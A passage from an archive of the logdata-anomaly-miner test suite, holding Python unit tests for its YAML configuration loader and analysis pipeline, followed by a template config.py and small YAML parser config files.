SimpleByteStreamLineAtomizerFactory)) self.assertTrue(isinstance(context.atomizer_factory.atom_handler_list[0], SubhandlerFilter)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, [aminer_config.yaml_data['Input']['timestamp_paths']]) def test16_parsermodeltype_parameter_for_another_parsermodel_type(self): """This test checks if all ModelElements with child elements are working properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.registered_components[2][0], NewMatchPathValueDetector)) self.assertTrue(isinstance(context.registered_components[3][0], NewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/model/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, FirstMatchModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0].children[0], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0].children[1], RepeatedElementDataModelElement)) self.assertTrue(isinstance( context.atomizer_factory.parsing_model.children[0].children[1].repeated_element, OptionalMatchModelElement)) self.assertTrue(isinstance( context.atomizer_factory.parsing_model.children[0].children[1].repeated_element.optional_element, FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[1], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2], ElementValueBranchModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2].value_model, FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2].branch_model_dict['host'], FixedDataModelElement)) # change OptionalModelElement to unknown_model aminer_config.yaml_data['Parser'][1]['args'] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change RepeatedElementDataModelElement to unknown_model aminer_config.yaml_data['Parser'][2]['args'][0] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change SequenceModelElement to unknown_model aminer_config.yaml_data['Parser'][3]['args'][1] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change ElementValueBranchModelElement to unknown_model aminer_config.yaml_data['Parser'][4]['args'][0] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') aminer_config.yaml_data['Parser'][4]['branch_model_dict'][0]['model'] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change FirstMatchModelElement to unknown_model aminer_config.yaml_data['Parser'][5]['args'][1] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') def test17_demo_yaml_config_equals_python_config(self): """This test checks if the yaml demo config is the same as the python version.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('demo/aminer/demo-config.yml') yml_context = AnalysisContext(aminer_config) yml_context.build_analysis_pipeline() aminer_config = AminerConfig.load_config('demo/aminer/demo-config.py') py_context = AnalysisContext(aminer_config) py_context.build_analysis_pipeline() import copy yml_config_properties = copy.deepcopy(yml_context.aminer_config.config_properties) del yml_config_properties['Parser'] del yml_config_properties['Input'] del yml_config_properties['Analysis'] del yml_config_properties['EventHandlers'] del yml_config_properties['LearnMode'] # remove SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler and NewMatchPathDetector as they are added by the YamlConfig. py_registered_components = copy.copy(py_context.registered_components) del py_registered_components[0] del py_registered_components[1] del py_registered_components[2] del py_registered_components[10] yml_registered_components = copy.copy(yml_context.registered_components) del yml_registered_components[0] del yml_registered_components[1] tmp = {} keys = list(py_registered_components.keys()) for i in range(1, len(py_registered_components)+1): tmp[i] = py_registered_components[keys[i-1]] py_registered_components = tmp py_registered_components_by_name = copy.copy(py_context.registered_components_by_name) del py_registered_components_by_name['SimpleUnparsedHandler'] del py_registered_components_by_name['VerboseUnparsedHandler'] del py_registered_components_by_name['NewMatchPath'] del py_registered_components_by_name['SimpleMonotonicTimestampAdjust'] yml_registered_components_by_name = copy.copy(yml_context.registered_components_by_name) del yml_registered_components_by_name['DefaultNewMatchPathDetector'] del yml_registered_components_by_name['AtomFilter'] self.assertEqual(yml_config_properties, py_context.aminer_config.config_properties) # there actually is no easy way to compare aminer components as they do not implement the __eq__ method. self.assertEqual(len(yml_registered_components), len(py_registered_components)) for i in range(2, len(yml_registered_components)): # skipcq: PTC-W0060 self.assertEqual(type(yml_registered_components[i]), type(py_registered_components[i])) self.assertEqual(yml_registered_components_by_name.keys(), py_registered_components_by_name.keys()) for name in yml_registered_components_by_name.keys(): self.assertEqual(type(yml_registered_components_by_name[name]), type(py_registered_components_by_name[name])) self.assertEqual(len(yml_context.real_time_triggered_components), len(py_context.real_time_triggered_components)) # the atom_handler_list is not equal as the python version uses a SimpleMonotonicTimestampAdjust. self.assertEqual(yml_context.atomizer_factory.default_timestamp_path_list, py_context.atomizer_factory.default_timestamp_path_list) self.assertEqual(type(yml_context.atomizer_factory.event_handler_list), type(py_context.atomizer_factory.event_handler_list)) def test18_etd_order(self): """Loads the template_config and checks if the position of the ETD was changed as expected.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/template_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertEqual(context.aminer_config.yaml_data['Analysis'][0]['type'].name, 'EventTypeDetector') self.assertEqual(context.aminer_config.yaml_data['Analysis'][1]['type'].name, 'NewMatchPathValueDetector') self.assertEqual(context.aminer_config.yaml_data['Analysis'][2]['type'].name, 'NewMatchPathValueComboDetector') self.assertEqual(context.aminer_config.yaml_data['Analysis'][3]['type'].name, 'NewMatchPathValueComboDetector') def test19_stream_printer_output_file(self): """Check if the output_file_path property of StreamPrinterEventHandler works properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/template_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertEqual(context.atomizer_factory.event_handler_list[0].stream.name, '/tmp/streamPrinter.txt') # skipcq: BAN-B108 self.assertEqual(context.atomizer_factory.event_handler_list[0].stream.mode, 'w+') def test20_suppress_output(self): """ Check if the suppress property and SuppressNewMatchPathDetector are working as expected. This test only includes the StreamPrinterEventHandler. """ __expected_string1 = '%s New path(es) detected\n%s: "%s" (%d lines)\n %s\n%s\n\n' t = time() fixed_dme = FixedDataModelElement('s1', b' pid=') match_context_fixed_dme = MatchContext(b' pid=') match_element_fixed_dme = fixed_dme.get_match_element("", match_context_fixed_dme) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, 'DefaultNewMatchPathDetector') datetime_format_string = '%Y-%m-%d %H:%M:%S' match_path_s1 = "['/s1']" pid = " pid=" __expected_string2 = '%s New value combination(s) detected\n%s: "%s" (%d lines)\n%s\n\n' fixed_dme2 = FixedDataModelElement('s1', b'25537 uid=') decimal_integer_value_me = DecimalIntegerValueModelElement( 'd1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context_sequence_me = MatchContext(b'25537 uid=2') seq = SequenceModelElement('seq', [fixed_dme2, decimal_integer_value_me]) match_element_sequence_me = seq.get_match_element('first', match_context_sequence_me) string2 = " (b'25537 uid=', 2)\n25537 uid=2" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/suppress_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() context.aminer_config.yaml_data['Analysis'][2]['suppress'] = False context.atomizer_factory.event_handler_list[0].stream = self.output_stream default_nmpd = context.registered_components[3][0] default_nmpd.output_logline = False self.assertTrue(default_nmpd.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), __expected_string1 % ( datetime.fromtimestamp(t).strftime(datetime_format_string), default_nmpd.__class__.__name__, 'DefaultNewMatchPathDetector', 1, match_path_s1, pid)) self.reset_output_stream() context.aminer_config.yaml_data['Analysis'][2]['suppress'] = True context = AnalysisContext(aminer_config) context.build_analysis_pipeline() context.atomizer_factory.event_handler_list[0].stream = self.output_stream default_nmpd = context.registered_components[3][0] default_nmpd.output_logline = False self.assertTrue(default_nmpd.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() value_combo_det = context.registered_components[1][0] log_atom_sequence_me = LogAtom(match_element_sequence_me.get_match_string(), ParserMatch(match_element_sequence_me), t, value_combo_det) context.atomizer_factory.event_handler_list[0].stream = self.output_stream self.assertTrue(value_combo_det.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), __expected_string2 % ( datetime.fromtimestamp(t).strftime(datetime_format_string), value_combo_det.__class__.__name__, 'ValueComboDetector', 1, string2)) self.reset_output_stream() context.aminer_config.yaml_data['Analysis'][0]['suppress'] = True context = AnalysisContext(aminer_config) context.build_analysis_pipeline() value_combo_det = context.registered_components[1][0] context.atomizer_factory.event_handler_list[0].stream = self.output_stream self.assertTrue(value_combo_det.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() def test21_suppress_output_no_id_error(self): """Check if an error is raised if no id parameter is defined.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/suppress_config.yml') aminer_config.yaml_data['Analysis'][0]['id'] = None aminer_config.yaml_data['Analysis'][0]['suppress'] = True context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test22_set_output_handlers(self): """Check if setting the output_event_handlers is working as expected.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/template_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() for index in context.registered_components: component = context.registered_components[index] if component[1] == 'EventTypeDetector': self.assertEqual(1, len(component[0].output_event_handlers)) self.assertEqual(StreamPrinterEventHandler, type(component[0].output_event_handlers[0])) else: self.assertEqual(None, component[0].output_event_handlers) def test23_check_functionality_of_validate_bigger_than_or_equal(self): """Check the functionality of the _validate_bigger_than_or_equal procedure.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/bigger_than_or_equal_valid.yml') self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/bigger_than_or_equal_error.yml') def test24_check_log_resource_list(self): """Check the functionality of the regex for LogResourceList..""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/wrong_log_resource_list.yml') def test25_check_mail_regex(self): """Check the functionality of the regex for MailAlerting.TargetAddress and MailAlerting.FromAddress.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/wrong_email.yml') with open('/usr/lib/logdata-anomaly-miner/aminer/schemas/BaseSchema.py', 'r') as sma: # skipcq: PYL-W0123 base_schema = eval(sma.read()) self.assertEqual(base_schema['MailAlerting.TargetAddress']['regex'], base_schema['MailAlerting.FromAddress']['regex']) target_address_regex = re.compile(base_schema['MailAlerting.TargetAddress']['regex']) valid_emails = ['john@example.com', 'john@example.co', 'root@localhost'] for email in valid_emails: self.assertEqual(target_address_regex.search(email).group(0), email, 'Failed regex check at %s.' % email) invalid_emails = ['john_at_example_dot_com', 'john@example.', '@example.com', ' @example.com'] for email in invalid_emails: self.assertEqual(target_address_regex.search(email), None, 'Failed regex check at %s.' % email) def test26_filter_config_errors(self): """Check if errors in multiple sections like Analysis, Parser and EventHandlers are found and filtered properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) try: aminer_config.load_yaml('unit/data/configfiles/filter_config_errors.yml') except ValueError as e: reg = re.compile( r"Config-Error: \{'AMinerGroup': \['unknown field'], 'Analysis': \[\{0: \['none or more than one rule validate', \{'oneof " r"definition [0-9]+': \[\{'learn_mode': \['unknown field'], 'reset_after_report_flag': \['unknown field'], 'type': \{'" r"allowed': \['ParserCount']}}]}]}], 'EventHandlers': \[\{1: \['none or more than one rule validate', \{'oneof definition " r"[0-9]+': \[\{'output_file_path': \['unknown field'], 'type': \{'allowed': \['SyslogWriterEventHandler']}}]}]}], 'Parser':" r" \[\{0: \['none or more than one rule validate', \{'oneof definition [0-9]+': \[\{'args2': \['unknown field'], 'type': \{" r"'forbidden': \['ElementValueBranchModelElement', 'DecimalIntegerValueModelElement', 'DecimalFloatValueModelElement', '" r"DateTimeModelElement', 'MultiLocaleDateTimeModelElement', 'DelimitedDataModelElement', 'JsonModelElement'," r" 'JsonStringModelElement']}}]}]}]}") self.assertIsNotNone(reg.match(str(e))) self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/filter_config_errors.yml') def test27_same_id_analysis(self): """Check if a ValueError is raised when the same id is used for multiple analysis components.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) try: aminer_config.load_yaml('unit/data/configfiles/same_id_analysis.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() except ValueError as e: msg = "Config-Error: The id \"NewMatchPathValueComboDetector\" occurred multiple times in Analysis!" self.assertEqual(msg, str(e)) context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test28_same_id_event_handlers(self): """Check if a ValueError is raised when the same id is used for multiple event handler components.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) try: aminer_config.load_yaml('unit/data/configfiles/same_id_event_handlers.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() except ValueError as e: msg = "Config-Error: The id \"handler\" occurred multiple times in EventHandlers!" self.assertEqual(msg, str(e)) context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test29_same_id_parser(self): """Check if a ValueError is raised when the same id is used for multiple parser components.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) try: aminer_config.load_yaml('unit/data/configfiles/same_id_parser.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() except ValueError as e: msg = "Config-Error: The id \"apacheModel\" occurred multiple times in Parser!" self.assertEqual(msg, str(e)) context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test30_parser_model_files(self): """Test if parser models from conf-enabled work properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/main.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() pm = context.atomizer_factory.parsing_model self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, [""]) self.assertTrue(isinstance(pm, FirstMatchModelElement)) # Sub1 self.assertTrue(isinstance(pm.children[0], SequenceModelElement)) self.assertTrue(isinstance(pm.children[0].children[0], FixedDataModelElement)) self.assertEqual(pm.children[0].children[0].element_id, "fix1") self.assertTrue(isinstance(pm.children[0].children[1], DecimalIntegerValueModelElement)) self.assertEqual(pm.children[0].children[1].element_id, "decimal1") # Sub2 self.assertTrue(isinstance(pm.children[1], SequenceModelElement)) self.assertTrue(isinstance(pm.children[1].children[0], DecimalIntegerValueModelElement)) self.assertEqual(pm.children[1].children[0].element_id, "decimal2") self.assertTrue(isinstance(pm.children[1].children[1], FixedDataModelElement)) self.assertEqual(pm.children[1].children[1].element_id, "fix2") self.assertTrue(isinstance(pm.children[1].children[2], DecimalFloatValueModelElement)) self.assertEqual(pm.children[1].children[2].element_id, "decimalFloat2") # Sub2 - Sub3 self.assertTrue(isinstance(pm.children[1].children[3], FirstMatchModelElement)) self.assertTrue(isinstance(pm.children[1].children[3].children[0], SequenceModelElement)) self.assertTrue(isinstance(pm.children[1].children[3].children[0].children[0], FixedDataModelElement)) self.assertEqual(pm.children[1].children[3].children[0].children[0].element_id, "fix3") self.assertTrue(isinstance(pm.children[1].children[3].children[0].children[1], DecimalFloatValueModelElement)) self.assertEqual(pm.children[1].children[3].children[0].children[1].element_id, "decimalFloat3") self.assertTrue(isinstance(pm.children[1].children[3].children[1], AnyByteDataModelElement)) self.assertEqual(pm.children[1].children[3].children[1].element_id, "any3") # Sub3 self.assertTrue(isinstance(pm.children[2], FirstMatchModelElement)) self.assertTrue(isinstance(pm.children[2].children[0], SequenceModelElement)) self.assertTrue(isinstance(pm.children[2].children[0].children[0], FixedDataModelElement)) self.assertEqual(pm.children[2].children[0].children[0].element_id, "fix3") self.assertTrue(isinstance(pm.children[2].children[0].children[1], DecimalFloatValueModelElement)) self.assertEqual(pm.children[2].children[0].children[1].element_id, "decimalFloat3") self.assertTrue(isinstance(pm.children[2].children[1], AnyByteDataModelElement)) self.assertEqual(pm.children[2].children[1].element_id, "any3") # ApacheAccessModel self.assertEqual(pm.children[3].element_id, "accesslog") def run_empty_components_tests(self, context): """Run the empty components tests.""" self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[1], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[3], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[4], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[5], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[6], DateTimeModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[7], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[8], FixedWordlistDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[9], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[10], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[11], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[12], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[13], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[14], DecimalIntegerValueModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[15], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[16], DecimalIntegerValueModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[17], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[18], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[19], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.element_id, 'accesslog') if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/__init__.py000066400000000000000000000000001437606560100247740ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/config.py000066400000000000000000000170061437606560100245200ustar00rootroot00000000000000# This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of py in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # py will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # skipcq: BAN-B108 # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'mail@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'mail@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "py Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 10 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 # config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct py how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement service_children_disk_upgrade = [ DateTimeModelElement('Date', b'%d.%m.%Y %H:%M:%S'), FixedDataModelElement('UName', b' ubuntu '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('HD Repair', b' System rebooted for hard disk upgrade')] service_children_home_path = [ FixedDataModelElement('Pwd', b'The Path of the home directory shown by pwd of the user '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Is', b' is: '), AnyByteDataModelElement('Path')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('Disk Upgrade', service_children_disk_upgrade), SequenceModelElement('Home Path', service_children_home_path)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(None) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [atom_filter], anomaly_event_handlers, default_timestamp_path_list=['']) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler atom_filter.add_handler(SimpleUnparsedAtomHandler(anomaly_event_handlers), stop_when_handled_flag=True) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name=None) atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/Home Path/Username', '/model/Home Path/Path'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name=None) atom_filter.add_handler(new_match_path_value_combo_detector) # Include the e-mail notification handler only if the configuration parameter was set. from aminer.events.DefaultMailNotificationEventHandler import DefaultMailNotificationEventHandler if DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS in analysis_context.aminer_config.config_properties: mail_notification_handler = DefaultMailNotificationEventHandler(analysis_context) analysis_context.register_component(mail_notification_handler, component_name=None) anomaly_event_handlers.append(mail_notification_handler) logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/000077500000000000000000000000001437606560100251655ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/Sub1.yml000066400000000000000000000005761437606560100265320ustar00rootroot00000000000000Parser: - id: 'fix1' type: FixedDataModelElement name: 'fix1' args: 'fixed1string' - id: 'decimal1' type: DecimalIntegerValueModelElement name: 'decimal1' - id: 'seq1' type: SequenceModelElement start: True name: 'seq1' args: - fix1 - decimal1 logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/Sub2.yml000066400000000000000000000011321437606560100265200ustar00rootroot00000000000000Parser: - id: 'decimal2' type: DecimalIntegerValueModelElement name: 'decimal2' - id: 'fix2' type: FixedDataModelElement name: 'fix2' args: 'fixed2string' - id: 'decimalFloat2' type: DecimalFloatValueModelElement name: 'decimalFloat2' - id: 'sub3' type: Sub3 name: 'sub3' - id: 'seq2' type: SequenceModelElement start: True name: 'seq2' args: - decimal2 - fix2 - decimalFloat2 - sub3 logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/Sub3.yml000066400000000000000000000011541437606560100265250ustar00rootroot00000000000000Parser: - id: 'fix3' type: FixedDataModelElement name: 'fix3' args: 'fixed3string' - id: 'decimalFloat3' type: DecimalFloatValueModelElement name: 'decimalFloat3' - id: 'seq3' type: SequenceModelElement name: 'seq3' args: - fix3 - decimalFloat3 - id: 'any3' type: AnyByteDataModelElement name: 'any3' - id: 'first3' type: FirstMatchModelElement start: True name: 'first3' args: - seq3 - any3 logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/data/configfiles/bigger_than_or_equal_error.yml000066400000000000000000000010771437606560100332660ustar00rootroot00000000000000LogResourceList: - 'file:///var/log/apache2/access.log' Parser: - id: 